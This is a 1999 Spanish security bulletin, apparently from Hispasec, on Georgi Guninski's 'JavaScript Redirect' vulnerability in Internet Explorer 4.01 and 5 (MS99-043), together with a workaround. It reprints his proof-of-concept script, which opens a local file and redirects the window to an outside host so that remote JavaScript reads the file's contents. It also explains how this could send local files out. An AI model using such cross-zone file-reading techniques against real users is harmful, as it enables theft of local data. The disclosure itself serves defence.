lunes, 18 de octubre de 1999

Vulnerabilidad "JavaScript Redirect" en Internet Explorer

El incansable Georgi Guninski vuelve a la carga con una nueva
vulnerabilidad que afecta al navegador de Microsoft. En esta
ocasión demuestra, una vez más, como a través de una página web
diseñada al efecto se puede leer de forma remota un archivo
local del usuario que la visita.
El código JavaScript a través del cual Guninski demuestra la
vulnerabilidad es el siguiente:


<SCRIPT>
alert("Cree un pequeño archivo de texto C:\\TEST.TXT y se leerá
y mostrará en una caja de diálogo ");
a=window.open("file://c:/test.txt");
a.location="http://www.nat.bg/~joro/reject.cgi?jsredir1";
</SCRIPT>

En principio nos encontramos con una línea encargada de mostrar
un cuadro de diálogo que explica la necesidad de contar con el
fichero "c:/test.txt" para poder llevar a cabo la demostración.

En la segunda línea del script, [a=window.open("file://c:/test.txt");],
se abre una nueva ventana de IE que muestra el fichero "c:/test.txt"
del disco local del usuario que visita la página. A continuación, se
llama a la misma ventana para redirigirla a la URL "http://www.nat.bg/
~joro/reject.cgi?jsredir1". Esta dirección no muestra una página web,
en su lugar devuelve código JavaScript, [javascript:alert(document.
body.innerText)], encargado de mostrar un cuadro de dialogo con el
contenido del fichero "test.txt" que se encuentra en la página.

El problema es que el código JavaScript, que devuelve la página a la
que ha sido redirigida la ventana, puede acceder a cualquier fichero
del sistema del usuario que visita la página y enviar su contenido a
un sitio remoto. Internet Explorer cree en todo momento que el código
JavaScript se encuentra bajo el contexto de seguridad de zona local,
por lo que se salta todas las restricciones de Microsoft que
impedirían, en condiciones normales, que código remoto interactuará
con los archivos locales.

Microsoft ha anunciado el desarrollo de un nuevo parche para esta
vulnerabilidad que afecta a las versiones 4.01 y 5 de su navegador.
Mientras tanto, la recomendación, ya típica, es deshabilitar la
opción de "Secuencias de comando Active-X", accesible a través del
menú Herramientas -> Opciones de Internet -> Seguridad.

Más información:
Boletín Seguridad Microsoft (MS99-043)
FAQ (MS99-043)
Demostración "JavaScript Redirect" por G.Guninski



Bernardo Quintero